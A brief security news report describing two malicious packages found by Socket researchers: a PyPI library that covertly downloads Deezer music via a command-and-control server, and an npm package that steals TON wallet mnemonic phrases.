Security researchers have discovered a malicious Python library called “automslc” on the Python Package Index (PyPI) that enables illegal music downloads from Deezer. Despite claiming to offer music automation and metadata retrieval services, the package has been downloaded over 104,000 times since its publication in May 2019.

Socket security researcher Kirill Boychenko revealed that the package covertly bypasses Deezer’s access restrictions by using hardcoded credentials and communicating with an external command-and-control server. The malicious library logs into Deezer using both user-supplied and embedded credentials to collect track metadata and download complete audio files, violating Deezer’s API terms.

The package regularly connects to a remote server at “54.39.49.17:8031” associated with the domain “automusic.win” to report download status. This effectively transforms users’ systems into nodes in an illicit network for unauthorized bulk music downloads, potentially exposing users to legal consequences.

In a separate incident, Socket also identified a rogue npm package called “@ton-wallet/create” that steals mnemonic phrases from TON ecosystem users while impersonating the legitimate “@ton/ton” package. Published in August 2024 with 584 downloads to date, this malicious package extracts cryptocurrency wallet information and transmits it to an attacker-controlled Telegram bot.

Following the report, the “automslc” package has been removed from PyPI.